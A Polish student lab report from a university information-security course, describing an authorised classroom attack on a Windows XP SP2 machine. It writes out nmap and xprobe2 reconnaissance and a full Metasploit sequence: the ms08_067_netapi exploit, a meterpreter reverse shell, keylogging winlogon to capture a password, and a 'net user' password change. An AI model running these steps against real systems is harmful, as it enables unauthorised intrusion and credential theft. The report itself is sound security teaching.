I9G2S1 Skrzypczynski Węgrecki lab1, WAT, SEMESTR V, podstawy bezpieczenstwa informacji


WOJSKOWA AKADEMIA TECHNICZNA

SPRAWOZDANIE

PODSTAWY BEZPIECZEŃSTWA INFORMACJI

LABORATORIUM NR 1

Prowadzący: mgr inż. Bartosz Kryński

Wykonał: Wojciech Węgrecki, Robert Skrzypczyński

Grupa: I9G2S1

  1. Cel zadania laboratoryjnego

Głównym naszym celem było włamanie się na komputer ofiary, przechwycenie jego hasła i zmiana. Aby tego dokonać musieliśmy się zapoznać z Linux Backtrack 5, Nmap, Xprobe2 oraz Metasploit. Linux Backtrack 5 był to system operacyjny z rodziny UNIX, na którym wykonywaliśmy wszystkie polecenia. Nmap służył do skanowania portów i wykrywania usług w sieci, Xprobe2 - do wykrywania wersji systemu operacyjnego, a metasploit to otwarte narzędzie służące do testów penetracyjnych i łamania zabezpieczeń systemów teleinformatycznych. Metasploit posiada bazę gotowych exploitów dzięki którym możemy dostać się do komputera ofiary.

  1. Wykonanie zadań powierzonych przez prowadzącego

Uruchomienie dostarczonego przez prowadzącego zajęcia systemu BackTrack 5, ustawienie adresacji IP z sieci laboratoryjnej

Poprzez polecenie ifconfig sprawdziliśmy numer IP naszego komputera.

Nr IP: 10.3.236.42

Maska: 255.255.255.0

Uruchomienie skanera sieciowego w celu wykrycia informacji dotyczących hosta ofiary

Wykonaliśmy to za pomocą programu Nmap poprzez wpisanie do konsoli:

nmap -A -sS 10.3.236.*/24 -p 8080

W jej wyniku otrzymaliśmy listę wszystkich hostów znajdujących się w sieci. Mieliśmy

znaleźć ten, który miał otwarty port 8080. Jedynym hostem spełniającym ten wymóg był

komputer o adresie IP: 10.3.236.109. Uzyskaliśmy również informacje o wersji systemu

Windows na nim zainstalowanym.

0x01 graphic

rys. 1 Screen przedstawiający wykonanie komendy nmap -A -sS 10.3.236.*/24 -p 8080 i znalezienie szukanego hosta

Uruchomienie programu xprobe2 do identyfikacji systemu operacyjnego ofiary

W celu dokładnego określenia systemu operacyjnego wykorzystaliśmy program xprobe2.

Po wpisaniu komendy xprobe2 10.3.236.109 uzyskaliśmy informację, że na komputerze ofiary zainstalowany jest system operacyjny Microsoft Windows XP SP2.

0x01 graphic

rys. 2 Efekt działania komendy xprobe

Wykorzystanie programu Metasploit w celu przejęcia kontroli nad hostem ofiary przy użyciu 2ch kodów payload:

Kolejną częścią zadania laboratoryjnego, było zainstalowanie keyloggera na komputerze

ofiary i przy jego pomocy uzyskanie hasła. Na początku w terminalu wpisaliśmy komendę

msfconsole, która powoduje włączenie się interfejsu msf.

0x01 graphic

rys. 3 Uruchomienie msf

Z powodu braku aktualizacji musieliśmy je pobrać i wykonaliśmy to za pomocą polecenia msfupdate.

0x01 graphic

rys. 4 Potwierdzenie aktualizacji

Interfejs msf umożliwia dostęp do opcji dostępnych w Metasploit Framework. Na stronie programu można znaleźć podatności poszczególnych systemów operacyjnych. Po ich wyszukaniu dla Microsoft Windows XP SP 2 okazało się, że jest to : ms08_067_netapi.

Jako payload wykorzystaliśmy moduł windows/meterpreter/reverse_tcp. Aby zainstalować keyloggera oraz uzyskać hasło logowania użyliśmy następującej sekwencji komend:

1. use exploit/windows/smb/ms08_067_netapi

2. set RHOST 10.3.236.109 (adres ip komputera ofiary)

3. set LHOST 10.3.236.42 (adres ip naszego komputera)

4. set PAYLOAD windows/meterpreter/reverse_tcp (załadowanie payload'a)

5. exploit

6. ps -m (wyświetlenie listy wszystkich procesów)

7. migrate 660 (podsłuchiwanie procesu winlogon.exe)

8. keyscan_start (włączenie nasłuchiwania wciśniętych klawiszy)

9. keyscan_dump (przechwycenie ciągu znaków)

10. keyscan_stop (wyłaczenie nasłuchiwania)

11. quit

Po tej sekwencji poprosiliśmy prowadzącego o zalogowanie się na swoje konto i w wyniku tego działania uzyskaliśmy hasło, którym był ciąg znaków: ala12345.

0x01 graphic

rys. 5 Efekt przechwycenia hasła

Następnie należało zmienić hasło na koncie ofiary. W tym celu wykorzystaliśmy tą samą podatność systemu Windows XP SP2, z tą różnicą że kodem payload był windows/shell/reverse_tcp. Zmiane uzyskaliśmy poprzez komendy:

1.set PAYLOAD windows/shell/reverse_tcp (przeładowanie payload'a)

2.exploit

3. net user Clico qaz123 (zmiana hasła na qaz123)

0x01 graphic

rys. 6 Zmiana hasła

  1. Wnioski

Wykonanie zadania uświadomiło nam jak łatwo można przejąć kontrolę nad czyimś komputerem. Nie potrzeba do tego bardzo zaawansowanych programów i technik. Mimo, że systemem operacyjnym, na który się włamywaliśmy był Windows XP z Service Pack 2, czyli nie taki stary i słaby system to udało nam się to bez większych problemów. Uświadomiło nam to jak ważna jest ochrona naszego komputera, jeżeli posiadamy na nim jakieś ważne informacje. Aby zabezpieczyć się przed ewentualnym atakiem należy regularnie instalować aktualizacje systemu, gdyż zawierają one naprawę znalezionych luk i tym samym zamykamy drogę dostępu do naszego komputera. Dodatkowo należy stosować programy antywirusowe oraz zapory sieciowe, które znacznie utrudniają lub całkowicie uniemożliwiają atak. Większość osób nie zdaje sobie sprawy z tego, że są to narzędzia niezbędne na komputerze mającym dostęp do Internetu. Dzięki tak łatwym zabiegom, nie wymagającym zbyt dużo czasu możemy ochronić się przed włamaniem do naszego komputera i wiążącymi się z tym stratami, zazwyczaj materialnymi.



Wyszukiwarka

Podobne podstrony:
I0E1S1 Muszy-ski Macha-owski, WAT, semestr V, podstawy bezpieczeństwa informacji
I9G2S1 Wegrecki sprawozdanie, WAT, SEMESTR V, podstawy symulacji
I9G2S1 Skrzypczynski Węgrecki lab2
egzamin 00, WAT, SEMESTR V, podstawy symulacji, psy, symulacja, symulacja egzamin
Program cwiczenia z przedmiotu BPiE, WAT, semestr IV, Bezpieczeństwo i ergonomia pracy
I9G2S1 Skrzypczynski Wegrecki l Nieznany
pbi zaliczenie, Studia, WAT Informatyka, Pbi - podstawy bezpieczeństwa informacji
I9G2S1 Skrzypczynski Węgrecki lab2
bank-program, WAT, SEMESTR V, podstawy symulacji, projekty, PS, PSym
bpie sciaga, WAT, semestr IV, Bezpieczeństwo i ergonomia pracy
kospekt, Studia, WAT Informatyka, Pbi - podstawy bezpieczeństwa informacji
Typowe zagrożenia, WAT, semestr VII, Bezpieczeństwo systemów informatycznych
Zadanie, WAT, semestr VII, Bezpieczeństwo systemów informatycznych
moje wypociny, WAT, semestr VII, Bezpieczeństwo systemów informatycznych
opracowane zagadnienia na egz - Kopia, Zarządzanie ZZL studia WAT, I SEMESTR, Podstawy Zarządzania

więcej podobnych podstron